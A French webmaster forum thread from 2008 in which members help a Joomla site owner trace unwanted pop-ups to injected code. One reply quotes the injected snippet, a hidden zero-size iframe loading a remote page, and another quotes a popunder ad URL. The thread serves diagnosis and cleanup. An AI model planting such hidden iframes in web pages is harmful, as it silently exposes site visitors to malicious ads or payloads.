Formation par Olivier Duffez

Formation au référencement par Olivier Duffez, créateur de WebRankInfo !
Une formule efficace alliant théorie et pratique, avec une haute disponibilité des intervenants
Cette formule a déjà convaincu plusieurs centaines d'entreprises, pourquoi pas vous ?
Réservez vite votre place en ligne (convention possible pour imputer sur le budget formation)

Formation référencement Marseille

Serveur Hacké ?

Aller à la page 1, 2  Suivante
Poster un nouveau sujet Imprimer cette discussion    Forum -> Administration d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
 
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 9:22    Sujet du message: Serveur Hacké ?

Bonjour tout le monde,

Je vous écrit aujourd'hui car j'ai besoin d'avoir des avis extérieur sur ce qu'il m'arrive depuis une semaine déjà. (J'ai cherché avant de poster)

Sur mon site (buzzmoica.Fr), des pop-ups s'ouvrent à tout va sur n'importe quelle de mes pages alors que bien sûr, je n'ai jamais installé de script pour de telles pubs.

La monétisation du site est uniquement avec Adsense qui vous le savez, n'autorise pas ces publicités intempestives.

Le site est hébergé sur un dédié OVH. Je leur ai écrit et j'attends toujours leur réponse.

Les pubs sont apparemment générées par une plateforme qui s'appelle Blue Advetiser.

Est ce que cela dit quelque chose à quelqu'un ? Avez vous déjà eu ce genre de problème ?

Merci d'avance pour vos réponses ! Laughing
 
thecashcow Visiter le site web du posteur
hebmaster
WRInaute passionné
WRInaute passionné

Inscrit le: 22 Déc 2005
Messages: 977
Localisation: Maroc

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 9:34    Sujet du message: Serveur Hacké ?

<hs>la balise "<style>" est autorisé dans le body? j'ai jamais vu un site le faire sauf sur le tien.</hs>
 
hebmaster Visiter le site web du posteur
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 9:37    Sujet du message: oui

Oui, elle est autorisée, cela peut poser problème ?
 
thecashcow Visiter le site web du posteur
nickargall
WRInaute accro
WRInaute accro

Inscrit le: 13 Juin 2005
Messages: 4025
Localisation: Exilé au Groland à cause de Joe Dalton

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 9:50    Sujet du message: Serveur Hacké ?

(hs) oui on peut le faire, mais c'est pas tres clean(/hs)

En ce qui concerne les popup : ca peut etre un bout de javascript que tu as inséré sur ton site (un truc de compteur gratuit, un script d'annuaire ..) qui génère ces affichages ? Mais j'ai pas vu grand chose dans ton code (survolé rapidement) qui puisse générer ça (a part ptet un script javascript "ltassrv" mais placé en commentaires html, donc ..
 
nickargall Visiter le site web du posteur
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 10:17    Sujet du message: oui

Merci pour les réponses Smile

J'ai pensé à ça au début, un bout de script perdu, mais rien. Et en plus, ya pas vraiment de raison qu'il y en ai.
Concernant les widgets qui pourraient contenir une pub, pareil, rien à signaler, je n'en ai pas installé.

C'est quand même incroyable dene pas savoir d'où ca vient non ? Smile Smile Smile

Je me demande si OVH n'est pas derrière tout ca.

Pourquoi je pense ça ? Parce que les popups ont commencé à apparaitre le 14 Aout, le jour où il y a eu un problème sur le serveur et qu'une équipe est intervenue sur le serveur. ils ont tout géré tout seul en 24 heures. J'étais en vacances, je ne me suis apperçu de rien. j'ai juste découvert les emails de maintenance...

De plus, ayant installé un disque USB supplémentaire sur le seveur il y a 2 mois, ce même problème était survenu. Il a disparu après que j'ai formaté le lecteur usb et fait son installation.

Ca me parrait logique pour considérer qu'il y a quelque chose avec ovh. Mais je ne comprends pas pourquoi ni comment !
(J'attends toujours la réponse de leur hotline)

Confused
 
thecashcow Visiter le site web du posteur
Bool
WRInaute accro
WRInaute accro

Inscrit le: 26 Fév 2004
Messages: 1244
Localisation: Lyon

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 10:25    Sujet du message: Serveur Hacké ?

Oh c'est clair que c'est vachement intéressant de la part d'OVH d'aller installer des popups sur les sites de certains clients dédiés...

Tu as un Joomla, et les failles de sécurité y sont fréquentes. Je chercherais d'abord de ce coté à ta place.
 
Bool Visiter le site web du posteur
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 10:29    Sujet du message: Serveur Hacké ?

Oui tu as raison, ca parrait absurde.
Je vais continuer sur la sécu alors...
Au hasard, Y aurait il un site qui puisse scanner en live et détecter les failles ?
Merci ! Smile Smile
 
thecashcow Visiter le site web du posteur
Spoiler
Nouveau WRInaute

Inscrit le: 26 Oct 2007
Messages: 46

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 10:33    Sujet du message: Serveur Hacké ?

Bonjour,
Regarde dans ton code, si tu n'as pas un appel vers cette page :
http://www.diydaily.info/player/player.php

C'est elle qui semble générer tes pop-ups. Cherche en ligne de commande, sinon download ton site, et fais une recherche dans le répertoire à l'aide de l'éditeur Notepad++

Bon Courage !
 
Spoiler
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 10:36    Sujet du message: ok

Je vais voir ca tout de suite, merci Smile
 
thecashcow Visiter le site web du posteur
guicara
WRInaute accro
WRInaute accro

Inscrit le: 02 Fév 2006
Messages: 2136
Localisation: Dans nos montagnes...

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 11:14    Sujet du message: Serveur Hacké ?

Moi je vois ça au chargement de ton index :



Voulu ?
 
guicara Visiter le site web du posteur
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 11:43    Sujet du message: non

Non, pas voulu du tout !
grrr, je cherche je cherche, merci à toi Guicara Smile
 
thecashcow Visiter le site web du posteur
bproductiv
WRInaute accro
WRInaute accro

Inscrit le: 27 Déc 2004
Messages: 2440
Localisation: La roche s/ yon

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 11:47    Sujet du message: Serveur Hacké ?

-http://creditburner.blueadvertise.com/popunder.php?uid=ZGFuaWVsMDEwMDE=

a tout hasard ??
 
bproductiv Visiter le site web du posteur
bproductiv
WRInaute accro
WRInaute accro

Inscrit le: 27 Déc 2004
Messages: 2440
Localisation: La roche s/ yon

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 11:48    Sujet du message: Serveur Hacké ?

trouvé avec firebug > script
 
bproductiv Visiter le site web du posteur
vaxrei
Nouveau WRInaute

Inscrit le: 13 Nov 2007
Messages: 41

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 11:55    Sujet du message: Serveur Hacké ?

regarde de ce coté :

Code:
<iframe frameborder="0"height="0"width="0"
src="http://www.diydaily.info/player/player.php"></iframe>
 
vaxrei
thecashcow
Nouveau WRInaute

Inscrit le: 11 Juin 2007
Messages: 43

URL permanente de ce messagePosté le : Jeu Aoû 21, 2008 12:45    Sujet du message: re

Re Bonjour,

Alors, grâce à vos réponses, je pense être sur la piste.
Comme vous l'avez noté, le site est développé sous Joomla.

Je pense pour l'instant que c'est le module lié au composant Mosets Tree qui a été infiltré.
Sur la page d'accueil, le module se nomme : "Vos Buzz à la Une" et il y a un module similaire dans la section news : "Vos Buzz au hasard"
Ce Script (Iframe) n'est présent que lorsque le module est présent.
Mais je ne suis pas sûr parce que le système de popups ne se déclenche pas toujours, cad que je peux actualiser la page sur laquelle la pub apparaissait sans pour autant qu'elle ne ressorte une deuxième fois...

Ca avance Smile
 
thecashcow Visiter le site web du posteur
 
Montrer les messages depuis:   
Revenir en haut    Forum -> Administration d'un site Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 2 - Aller à la page 1, 2  Suivante
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

Autres sujets de discussion :

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™


 ODP  Firefox  Alsacreations  annuaire webmaster Yagoort